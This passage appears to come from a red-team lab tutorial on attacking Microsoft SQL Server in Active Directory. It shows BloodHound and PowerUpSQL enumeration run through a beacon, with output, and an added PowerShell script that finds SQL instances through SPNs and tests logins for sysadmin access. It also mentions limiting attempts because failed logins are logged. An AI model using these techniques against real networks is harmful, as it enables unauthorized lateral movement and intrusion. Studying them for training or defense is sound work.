Microsoft SQL Server (MSSQL) is Microsoft's relational database management system. In an Active Directory environment it is most often found on Windows hosts, frequently running under a domain service account and accepting Windows (Kerberos/NTLM) logins.
MSSQL becomes a useful target when we hold a privileged login (e.g. sysadmin) on an instance, or when an instance we can reach has a linked server that lets us pivot to another MSSQL server using the credentials configured on the link.
We can query BloodHound for users that can control an MSSQL server with the following Cypher query (the SQLAdmin edge is derived from MSSQLSvc SPNs on user accounts, since the service account typically holds sysadmin on that instance):
MATCH p=(u:User)-[:SQLAdmin]->(c:Computer) RETURN p
Alternatively, look for OUs or groups with "sql" in the name.
Once we know which user can control the MSSQL server and we are running in that user's context (or hold their credentials), we can import PowerUpSQL into the beacon and test connectivity. Get-SQLInstanceDomain enumerates instances from MSSQLSvc SPNs in the domain, and Get-SQLConnectionTest attempts a login to each one as the beacon's current security context:
beacon> powershell-import /opt/PowerUpSQL/PowerUpSQL.ps1
[*] Tasked beacon to import: /opt/PowerUpSQL/PowerUpSQL.ps1
[+] host called home, sent: 201904 bytes
beacon> powershell Get-SQLInstanceDomain | Get-SQLConnectionTest
[*] Tasked beacon to run: Get-SQLInstanceDomain | Get-SQLConnectionTest
[+] host called home, sent: 393 bytes
[+] received output:
#< CLIXML
ComputerName Instance Status
------------ -------- ------
sql01.rastalabs.local sql01.rastalabs.local,1433 Accessible
sql01.rastalabs.local sql01.rastalabs.local Accessible
sql02.rastalabs.local sql02.rastalabs.local,1433 Not Accessible
sql02.rastalabs.local sql02.rastalabs.local Not Accessible
SharpSQL (https://github.com/mlcsec/SharpSQL) is a C# alternative that provides the same enumeration without a PowerShell import:
SharpSQL.exe Get-SQLInstanceDomain
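The two PowerUpSQL cmdlets above are convenient, but it helps to know what the "Accessible" verdict actually means. The following PowerShell is an added example (not from the original page and not PowerUpSQL or SharpSQL code) that reproduces both steps with plain .NET: it pulls MSSQLSvc SPNs from LDAP, derives the instance string the same way the output above shows it (host,port for a port SPN, host\name for a named instance, bare host otherwise), and attempts an integrated-auth login on each instance, reporting which login we landed as and whether it is sysadmin. The function names Get-SqlInstancesFromSpn and Test-SqlConnection are made up for this example; it assumes a domain-joined host from which LDAP and the SQL ports are reachable.

```powershell
# Added example: how "Get-SQLInstanceDomain | Get-SQLConnectionTest" works under the hood.
# Not PowerUpSQL code. Assumes a domain-joined host; function names are hypothetical.

# 1. Enumerate SQL instances from MSSQLSvc SPNs in the current domain via LDAP.
function Get-SqlInstancesFromSpn {
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.Filter   = '(servicePrincipalName=MSSQLSvc/*)'
    $searcher.PageSize = 1000
    [void]$searcher.PropertiesToLoad.Add('servicePrincipalName')
    [void]$searcher.PropertiesToLoad.Add('samAccountName')

    foreach ($result in $searcher.FindAll()) {
        foreach ($spn in $result.Properties['serviceprincipalname']) {
            if ($spn -notlike 'MSSQLSvc/*') { continue }
            # SPN forms: MSSQLSvc/host:1433, MSSQLSvc/host:INSTANCENAME, MSSQLSvc/host
            $target = $spn.Substring('MSSQLSvc/'.Length)
            $hostName, $suffix = $target -split ':', 2
            $instance = if (-not $suffix)               { $hostName }               # default instance
                        elseif ($suffix -match '^\d+$') { "$hostName,$suffix" }     # explicit port
                        else                            { "$hostName\$suffix" }     # named instance
            [pscustomobject]@{
                ComputerName   = $hostName
                Instance       = $instance
                ServiceAccount = [string]$result.Properties['samaccountname'][0]  # account holding the SPN
            }
        }
    }
}

# 2. Attempt a login as the current security context (the beacon's token), which is
#    what PowerUpSQL does by default. A failed attempt is still logged by SQL Server
#    (error 18456 in the SQL error log / Application event log), so keep the list tight.
function Test-SqlConnection {
    param(
        [Parameter(Mandatory)][string]$Instance,
        [int]$TimeoutSeconds = 3
    )
    $connString = "Server=$Instance;Database=master;Integrated Security=SSPI;Connect Timeout=$TimeoutSeconds"
    $conn = New-Object System.Data.SqlClient.SqlConnection $connString
    try {
        $conn.Open()
        $cmd = $conn.CreateCommand()
        # Who did we log in as, and is that login already sysadmin?
        $cmd.CommandText = "SELECT SYSTEM_USER AS LoginName, IS_SRVROLEMEMBER('sysadmin') AS IsSysadmin"
        $reader = $cmd.ExecuteReader()
        [void]$reader.Read()
        $sa = $reader['IsSysadmin']   # 1, 0, or DBNull
        [pscustomobject]@{
            Instance   = $Instance
            Status     = 'Accessible'
            LoginName  = [string]$reader['LoginName']
            IsSysadmin = ($sa -is [int] -and $sa -eq 1)
            Error      = $null
        }
    } catch {
        # Distinguish "login denied for this user" from "host/port unreachable" via the message.
        [pscustomobject]@{
            Instance   = $Instance
            Status     = 'Not Accessible'
            LoginName  = $null
            IsSysadmin = $null
            Error      = $_.Exception.Message
        }
    } finally {
        $conn.Dispose()
    }
}

# Usage: enumerate, de-duplicate, and test every instance with the current token.
Get-SqlInstancesFromSpn |
    Sort-Object Instance -Unique |
    ForEach-Object { Test-SqlConnection -Instance $_.Instance } |
    Format-Table -AutoSize
```

Two points worth noting from this. First, "Accessible" only means a TDS login succeeded for the token the beacon is running under; a "Not Accessible" result may be a network or firewall problem rather than a permissions one, which is why the example keeps the exception message. Second, the same host can appear twice (with and without ",1433"), exactly as sql01 does in the output above, because the SPN set usually contains both forms.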
With a connection confirmed, the next step is to check what that login can actually do on the server. Using PowerUpSQL we can do this by running a query against the database: